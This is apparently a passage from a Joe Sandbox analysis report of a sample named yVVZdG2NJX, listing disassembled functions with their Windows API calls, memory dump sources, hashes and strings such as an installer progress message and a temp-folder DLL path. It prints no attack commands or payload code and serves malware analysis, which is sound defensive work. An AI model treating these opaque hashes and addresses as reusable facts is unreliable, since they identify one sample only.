                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                      • String ID: @H1v
                                                                      • API String ID: 4216380887-3152185570
                                                                      • Opcode ID: eeb1c1d3a61acaeaa7bfd5894ed94ae3cf22c8ccfa940ddfd31125f33711363e
                                                                      • Instruction ID: 0fa21af0befb9066299e0e1d5ae623e18a065c0fb618b6db41c599dbdcb1038b
                                                                      • Opcode Fuzzy Hash: eeb1c1d3a61acaeaa7bfd5894ed94ae3cf22c8ccfa940ddfd31125f33711363e
                                                                      • Instruction Fuzzy Hash: 1B41A9B7008309EFD3159F22D840E2EB7BCEBA4310B21491DF946CA750DB75A985DB61
                                                                      Function 004052FF Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                      • lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                      • lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,774D23A0), ref: 0040535A
                                                                      • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                      • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                      • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                      • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                      Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                      • GetMessagePos.USER32 ref: 00404BEC
                                                                      • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                      • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                      • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                      Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                      • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID: Tahoma
                                                                      • API String ID: 3808545654-3580928618
                                                                      • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                      • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                      • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                      • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                      Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                      • MulDiv.KERNEL32(0008AC0E,00000064,0008AC12), ref: 00402E3C
                                                                      • wsprintfW.USER32 ref: 00402E4C
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402E46
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                      • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                      • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                      • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                      Function 703D256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 703D121B: GlobalAlloc.KERNELBASE(00000040,?,703D123B,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D1225
                                                                      • GlobalFree.KERNEL32(?), ref: 703D265B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D2690
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: faef8c4b4c90110840c1530af79d72480afc6e44aa6b9f91e2fb1b468928fcbc
                                                                      • Instruction ID: fb832094c7884de74f2bf7b9efce372ff3649b8ff3fec46509b6ce6ae06d05ca
                                                                      • Opcode Fuzzy Hash: faef8c4b4c90110840c1530af79d72480afc6e44aa6b9f91e2fb1b468928fcbc
                                                                      • Instruction Fuzzy Hash: 6031CD73508201EFD7168F65CC98D2EBBBEEBAA304720456CF64287360D7B5EC169B25
                                                                      Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp$C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll
                                                                      • API String ID: 3109718747-3433333103
                                                                      • Opcode ID: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                      • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                      • Opcode Fuzzy Hash: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                      • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                      Function 703D18DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: 4d9ccd67bd6540f3ad9fa6a238ce54be75bf0c37619a0816db63a7cfc75c94c6
                                                                      • Instruction ID: 09a3cb52745f40ffa910933b9c97291ce0e93028a384f6ffc8db6238564c2df6
                                                                      • Opcode Fuzzy Hash: 4d9ccd67bd6540f3ad9fa6a238ce54be75bf0c37619a0816db63a7cfc75c94c6
                                                                      • Instruction Fuzzy Hash: DC51E873D12159BFCB039FB4CA805AEBBBEEB45310B12426DE406E7344D771AE829791
                                                                      Function 703D1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,703D21F0,?,00000808), ref: 703D1639
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,703D21F0,?,00000808), ref: 703D1640
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,703D21F0,?,00000808), ref: 703D1654
                                                                      • GetProcAddress.KERNEL32(703D21F0,00000000), ref: 703D165B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D1664
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                      • String ID:
                                                                      • API String ID: 1148316912-0
                                                                      • Opcode ID: ed504c4e7f0ed1ef2c2a72bc416c4374fe0dbc42f3a7d2c8175b45d07c913bce
                                                                      • Instruction ID: 9b9fae21d3f9bbd4559c6f6f74970a6b45740cb8dcf472a490a6d4bfdf917855
                                                                      • Opcode Fuzzy Hash: ed504c4e7f0ed1ef2c2a72bc416c4374fe0dbc42f3a7d2c8175b45d07c913bce
                                                                      • Instruction Fuzzy Hash: 98F01C732061387BD62017A78C4CD9BBF9CDF8B2F5B210221F629D21A086658D01DBF1
                                                                      Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                      • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                      • Opcode Fuzzy Hash: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                      • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                      Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                      • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                      • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                      • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                      Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                      • wsprintfW.USER32 ref: 00404B65
                                                                      • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
